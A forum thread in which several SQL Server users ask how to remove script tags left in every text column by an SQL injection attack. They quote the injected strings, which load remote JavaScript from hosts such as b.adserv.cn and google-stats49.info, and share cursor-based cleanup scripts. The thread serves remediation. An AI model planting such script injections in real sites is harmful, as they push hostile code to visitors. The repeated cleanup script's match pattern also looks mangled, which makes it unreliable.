0

I got a sql injection hack that put this after each description in my database. <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>

any idea how to remove it without deleting the descrition?

Here is what I have

HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>

Here is what I need
HIM PORTRAIT SHIRT

3000 items / rows need to be cleaned up too much to do it manally!!!

4
Contributors
6
Replies
7
Views
8 Years
Discussion Span
Last Post by ehotbid
0

I found this but the colum is in text

DECLARE @sql NVARCHAR(4000)
DECLARE @InsertedValue NVARCHAR(1000)
SET @InsertedValue = 'The Script tags which were inserted'
DECLARE cur CURSOR FOR
  	select 'update [' + sysusers.name + '].[' + sysobjects.name + ']
  		set [' + syscolumns.name + '] = replace([' + syscolumns.name + '], ''' + @InsertedValue + ''', '''')'
  	from syscolumns
  	join sysobjects on syscolumns.id = sysobjects.id
  		and sysobjects.xtype = 'U'
  	join sysusers on sysobjects.uid = sysusers.uid
  	where syscolumns.xtype in (35, 98, 99, 167, 175, 231, 239, 241, 231)
  OPEN cur
  FETCH NEXT FROM cur INTO @sql
  WHILE @@FETCH_STATUS = 0
  BEGIN
  	exec (@sql)
  	FETCH NEXT FROM cur INTO @sql
  END
  CLOSE cur
  DEALLOCATE cur
0

This worked

use Your database name

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script></script>%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
0

Dynamic SQL is very risky!!

I'm Sorry but this is totally not true because it depends on the person who wrote it

because in sql you should never ever ever do concatenation to make queries, you should use parametrized queries.
and if the columns or the tables were dynamic you should use quotename().
in SQL injection there is nothing to do with it in Dynamic SQL it all depends on how you wrote it.

0

You don't avoid injection just from application, but to run any code against the SP + it's not maintainable and this is the big risk in business application development, I'm sure for every scenario use think I must use dynamic SQL there's better solution by not it.

0

i have this sql injection
on my database
</title><script src=http://google-stats49.info/ur.php></script>
i want to remove it has affected almost all the tables
please let me know how this can be done thanks
Thanks

removing it manually will take lots of time
please let me know .
and also I would like to know how to stop further attach
Thanks

This worked

use Your database name

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script></script>%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

I have this attach on my database
</title><script src=http://google-stats49.info/ur.php></script>

please let me know what is the code and how to run it on enterprise edition

This worked

use Your database name

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script></script>%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

How did you run this please let me know
on sql enterprice manager please let me know
even I have the similar attach I would like to remove from my database also
Looking to hear form you
Thanks

Edited by Ezzaral: n/a

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.